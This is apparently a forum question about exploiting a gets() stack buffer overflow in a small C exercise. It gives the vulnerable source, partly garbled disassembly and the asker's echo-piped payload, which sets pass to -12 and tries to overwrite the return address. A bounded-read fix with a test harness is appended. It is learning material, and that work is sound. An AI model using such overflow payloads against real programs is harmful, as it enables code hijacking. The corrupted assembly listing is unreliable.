Question: Buffer Overflow Attack: How do I print the pass value to be -12 and execute the hidden_func() for the C program below?

buffer1.c:

    #include <stdio.h>

    int func1()
    {
        printf("executing func1() ");
        return 1;
    }

    int hidden_func()
    {
        printf("executing hidden_func () ");
    }

    int func2()
    {
        signed short pass = 0;
        char arr[12];
        gets(arr);                  /* unbounded read into a 12-byte buffer */
        printf("pass:%d ", pass);
        puts(arr);
        return 0;
    }

    int main()
    {
        func2();
        return 0;
    }

Assembly Code for fun2:

    000000000004005e2  +:    push    %rbp
    000000000004005e3  +1    mov     %rsp,%rbp
    000000000004005e6  +4:   sub     $010,%rsp
    000000000004005ea  +8    movw    $,2(%rbp)
    000000000004005f0  +14:  lea     1(%rbp),%rax
    000000000004005f4  +18:  mov     %rax,%rdi
    000000000004005f7  +21:  callq   4004c
    000000000004005fc  +26:  movswl  2(%rbp),%eax
    00000000000400600  +3:   mov     %eax,%esi
    00000000000400602  +32:  mov     $04006fa,%edi
    00000000000400607  +37:  mov     $x,%eax
    0000000000040060c  +42:  callq   0400490 printf@plt>
    00000000000400611  +47:  lea     1(%rbp),%rax
    00000000000400615  +51:  mov     %rax,%rdi
    00000000000400618  +54:  callq   0400480
    0000000000040061d  +59:  mov     $x,%eax
    00000000000400622  +64:  leaveq
    00000000000400623  +65:  retq
    End of assembler dump.

Assembly Code for hidden_func:

    Dump of assembler code for function hidden_func:
    00000000004005d2+:     push   %rbp
    000000000004005d3+1:   mov    %rsp,%rbp
    x00000000004005d6 :    callq  0400480
    000000000004005e+14 :  pop    %rbp
    000000000004005e1 :    retq
    End of assembler dump.

My buffer attack (it's printing pass value -12, but not printing the hidden func):

    $ echo -e "12345678123456\xf4\xff\xff\xff\xff\xc\x0012345678\xd2\x05\x40\x00\x00\x00\x0" | ./buffer1
    pass:-12
    12345678123456
    Segmentation fault (core dumped)
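For contrast with the gets(arr) call in func2(), here is an added example (not code from the original post) of the same function with a bounded read, so an overlong line leaves pass at 0 instead of reaching the neighbouring stack slots. The names read_line_bounded, func2_bounded and feed, and the sample input, are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define ARR_LEN 12                 /* same size as arr[] in func2() */
struct outcome { int pass, stored, truncated; };

/* Bounded stand-in for gets(): at most cap-1 bytes kept, excess discarded. */
static int read_line_bounded(FILE *in, char *dst, size_t cap, int *truncated)
{
    *truncated = 0;
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) return -1;
    size_t n = strcspn(dst, "\n");
    if (dst[n] == '\n') {
        dst[n] = '\0';
    } else {                       /* no newline seen: drain the rest */
        for (int c; (c = getc(in)) != EOF && c != '\n'; )
            *truncated = 1;
    }
    return (int)n;                 /* bytes stored in dst */
}

/* Same locals as func2(), but the read cannot go past arr. */
static struct outcome func2_bounded(FILE *in)
{
    signed short pass = 0;
    char arr[ARR_LEN];
    struct outcome r = { 0, 0, 0 };
    r.stored = read_line_bounded(in, arr, sizeof arr, &r.truncated);
    r.pass = pass;
    return r;
}

/* Constructed input: 14 filler bytes, 0xf4 0xff, then more filler. */
static const char OVERLONG[] = "12345678123456" "\xf4\xff" "AAAAAAAAAAAAAAAA\n";
struct outcome feed(const char *bytes, size_t len)
{
    struct outcome r = { -1, -1, 0 };
    FILE *f = tmpfile();           /* stands in for stdin */
    if (f == NULL) return r;
    fwrite(bytes, 1, len, f);
    rewind(f);
    r = func2_bounded(f);
    fclose(f);
    return r;
}
int main(void)
{
    struct outcome r = feed(OVERLONG, sizeof OVERLONG - 1);
    printf("pass:%d stored:%d truncated:%d\n", r.pass, r.stored, r.truncated);
    return 0;
}
```

The truncated flag lets the caller reject or log an overlong line rather than silently accepting the first 11 bytes.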
